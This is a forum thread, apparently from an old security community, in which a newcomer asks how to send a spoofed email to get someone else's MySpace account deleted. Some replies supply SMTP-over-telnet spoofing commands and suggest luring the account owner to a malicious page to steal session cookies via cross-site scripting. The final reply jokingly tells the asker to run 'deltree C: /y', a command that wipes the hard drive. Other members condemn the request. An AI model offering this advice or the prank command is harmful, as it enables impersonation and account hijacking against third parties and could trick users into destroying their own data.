Page 1 of 2 12 LastLast

Thread: help

help

good day to all. im new at this so if any1 could help me out that would b great! how do i send a spoof mail im trying to delete a myspace account

Welcome to ao. The members here are not likely going to assist you in what your asking for.
    "I have died, I will die, It's alright, I don't mind"

Let me be the first to say......WHAT?

Cheers:
    DjM

http://www.datastronghold.com/securi...-software.html

you can do it easliy over telnet... telnet iname.com used to work but i guess they shut it down, you just need to find a server you can connect to via telnet than just use commands like

mail from: whatever@whatever.com

rcpt to: friend@something.com

data

now you just type your email message and send it ...

btw: I dont know how your gonna delete a mysapce account with that because you need to be logged in to that account and request canceleation and they send you an email then you click a link in it and then confirm the cancelation again....if you dont have access to that acount you can't cancel it...simple enough?
    O.G at A.O

No matter if you spoof the email the reply confirming the cancel will be sent to the orignal owner.
    Sorry but this deserves a flame... I'm just not up to it.

Talking

Quote Originally Posted by faust
    No matter if you spoof the email the reply confirming the cancel will be sent to the orignal owner.
    Sorry but this deserves a flame... I'm just not up to it.
    If i understand the question correctly, then the original Poster wants a random myspace page to be canceled.
    But as the poster does not infact own the myspace page. He/She wants to send a spoofed email pretending to be the owner of this Myspace page, thus pretending to be the owner of the Myspace page, in hoping that the admin's at Myspace read the email, see that it comes from the Myspace owners email {When in reality it isn't from the real email addresse, or the actual owner of the Myspace Page, as it's a spoofed email..} addresse, and thus just delete the Myspace page.

CopyRight is on the right track, but the technique is a rather old outdated technique, and i would be suprised if infact it worked..

My only suggestion would to maybe suck the owner into visiting a malicious setup webpage and try to grab there session cookies while they are logged into there Myspace account, thus enabling you to temporarly log in change important details like email, password etc then once you've taken control then request the Myspace page cancelation from there.

I won't link you to where a nice xss script is that currently works on Myspace, {As that would be against this websites TOS. but maybe have a look at milw0rm website and modify one of the xss scripts to suit your needs.

Since when has such questions been tolerated on AO? I am really surprised at the lax responses to what is more than likely a malicious hacking attempt. guess traffic has just got that slow here. meh...
    "I have died, I will die, It's alright, I don't mind"

Banned
    Since when has such questions been tolerated on AO?
    It's not so much the questions... more the answers. The days that we got riled up over questions like thise one are long gone - the days that we tried to understand them are prehistoric...

Quote Originally Posted by eman007
    good day to all. im new at this so if any1 could help me out that would b great! how do i send a spoof mail im trying to delete a myspace account
    WTF?

th_picardWTF.jpg
    "entia non sunt multiplicanda praeter necessitatem"

"entities should not be multiplied beyond necessity."

-Occam's Razor

run deltree C: /y in command prompt and it will ask you which myspace account to delete.